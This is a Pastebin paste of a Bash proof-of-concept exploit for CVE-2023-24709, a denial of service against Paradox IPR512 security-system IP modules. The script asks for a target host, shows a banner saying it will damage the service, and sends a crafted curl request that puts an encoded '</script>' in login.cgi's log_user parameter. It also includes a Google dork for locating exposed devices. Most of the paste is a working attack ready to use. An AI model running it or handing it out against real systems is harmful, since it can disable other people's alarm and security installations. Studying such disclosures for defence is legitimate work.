Advertisement
FlyFar

Paradox Security Systems IPR512 - Denial Of Service - CVE-2023-24709

Jan 30th, 2024
1,044
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.48 KB | Cybersecurity | 0 0
  1. #!/bin/bash
  2.  
  3. # Exploit Title: Paradox Security Systems IPR512 - Denial Of Service
  4. # Google Dork: intitle:"ipr512 * - login screen"
  5. # Date: 09-APR-2023
  6. # Exploit Author: Giorgi Dograshvili
  7. # Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423)
  8. # Version: IPR512
  9. # CVE : CVE-2023-24709
  10.  
  11. # Function to display banner message
  12. display_banner() {
  13.   echo "******************************************************"
  14.   echo "*                                                    *"
  15.   echo "*                PoC CVE-2023-24709                  *"
  16.   echo "*      BE AWARE!!! RUNNING THE SCRIPT WILL MAKE      *"
  17.   echo "*    A DAMAGING IMPACT ON THE SERVICE FUNCTIONING!   *"
  18.   echo "*                                by SlashXzerozero   *"
  19.   echo "*                                                    *"
  20.   echo "******************************************************"
  21. }
  22.  
  23. # Call the function to display the banner
  24. display_banner
  25.   echo ""
  26.   echo ""
  27.   echo "Please enter a domain name or IP address with or without port"
  28. read -p  "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain
  29.  
  30. # Step 2: Ask for user confirmation
  31. read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm
  32. if [[ $confirm == "Y" || $confirm == "y" ]]; then
  33.   # Display loading animation
  34.   animation=("|" "/" "-" "\\")
  35.  index=0
  36.  while [[ $index -lt 10 ]]; do
  37.    echo -ne "Loading ${animation[index]} \r"
  38.    sleep 1
  39.    index=$((index + 1))
  40.  done
  41.  
  42.  # Use curl to send HTTP GET request with custom headers and timeout
  43.  response=$(curl -i -s -k -X GET \
  44.    -H "Host: $domain" \
  45.    -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \
  46.    -H "Accept: */" \
  47.    -H "Referer: http://$domain/login.html" \
  48.    -H "Accept-Encoding: gzip, deflate" \
  49.    -H "Accept-Language: en-US,en;q=0.9" \
  50.    -H "Connection: close" \
  51.    --max-time 10 \
  52.    "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982")
  53.  
  54.  # Check response for HTTP status code 200 and print result
  55.  if [[ $response == *"HTTP/1.1 200 OK"* ]]; then
  56.    echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html"
  57.  else
  58.    echo -e "\nShouldn't be vulnerable! Please check the webpanel:  http://$domain/login.html"
  59.  fi
  60. else
  61.  echo "The script is stopped!."
  62. fi
  63.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement